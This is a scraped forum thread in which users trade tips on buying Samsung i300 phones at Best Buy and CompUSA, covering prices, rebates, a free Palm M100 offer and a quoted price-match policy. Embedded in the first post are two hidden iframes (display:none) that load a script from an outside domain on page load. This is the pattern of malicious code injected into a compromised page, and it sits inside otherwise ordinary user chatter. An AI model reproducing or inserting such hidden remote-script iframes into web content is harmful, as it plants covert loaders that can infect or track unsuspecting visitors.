+ Reply to Thread

I300s at Best Buy

For those of you who have yet to get your hands on one of these awesome devices, I saw some at Best Buy last night. The best part is that starting Sunday if you buy the I300 they will give you a Palm M100 for free!!!

I wish I would have waited.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

hmmmmmm

anyone know compusa's price match / return policy?

Brooks

Talking

Is the price still $499?

Even if so, I may still return mine to Sprint (I'm still within the 14 day time-frame) and get it from Best Buy.

hmmm... here is compusa's policy:

*We'll beat any legitimate price from any local authorized retail store on every product we sell, either at the time of purchase or within the following 14 days. Our low price guarantee pertains to all new, factory-sealed products of the same brand and model number that are available and in-stock at any local authorized retail store. Our guarantee does not apply to competitors' one-of-a-kind or other limited-quantity offers, special financing, installation, online competitors, rebates or when a bonus or free offer is included in the purchase.

Brooks

As if

None at Best Buy out here in Northern Cal. All I got was a blank look for the counter person (imagine that)

Re: All I got was a blank look for the counter person

Maybe his screen went off. Happens to my '35 once in a while!

Can you tell me in what store (best buy) you saw it?
    I been looking everywhere.

I saw three of the phones in the Birmingham, AL. store. They suposedly just got them in last week.

I've been to Best Buy & CompUSA...they don't know jack about anything her in Houston. Telesales had them, ordered over the phone and had it in a day an half.

Talking Good deal

Hey folks
    Finally I got mine from Best Buy, I went and search using the SKU on their system. I went to 6 diferent stores and I found two (1 demo they didn't want to sell it and 1 more that they guy didn't know they have it) we found it in a corner of the draws.

Anyway $469
    minus 10% off from coupon from best buy (I got it by mail)
    minus $30 mail rebate
    + free Palm M100 ($4 value)
    24 monhs interest free

And the y say for 60 bucks I can get replacement plan for 3 years.

Can beat that

This weeken some stores will get some I300. (Atlanta Metro Area)

Good luck

Thumbs up

Here is the SKU Number:

FYI, the free m100 offer only applies to new activations. I probed a bit, and got the guy to admit that their definition of "new activation" is anyone who's not activating the phone with an existing SPCS phone number. So if you're not on a contract and/or don't care about keeping your old number, you qualify. On the other hand, if losing your existing number would be a big deal (sadly true in my case), you don't qualify.

I'm not totally sure about the terms of the $30 rebate. I suspect there are strings attached to it because there was a footnote on the pricetag (missing the footnote itself), but I'm not sure what they are.

I'm not sure whether it was a typo, or whether different Best Buy stores in the same city can actually have different prices, but one (Bird Road @ Palmetto Xway) had it marked for $369.87 ($399.87 - $30 rebate), but another (Okeechobee Road @ Palmetto Xway) had it marked $339.87 ($369.97 - $30). Neither one had it in stock, though.

The ass't. manager at the first store DID say that any shortage of i300s will be a thing of the past by next week. Apparently, Samsung shipped a small quantity to the US via air freight (the ones that hit CompUSA and eBay over the past 3 weeks), and sent the rest via boat.

I went to the store and bought the phone they give the palm M100 without any question (new activation or contract).

the activation it's outside of the store (online or by phone).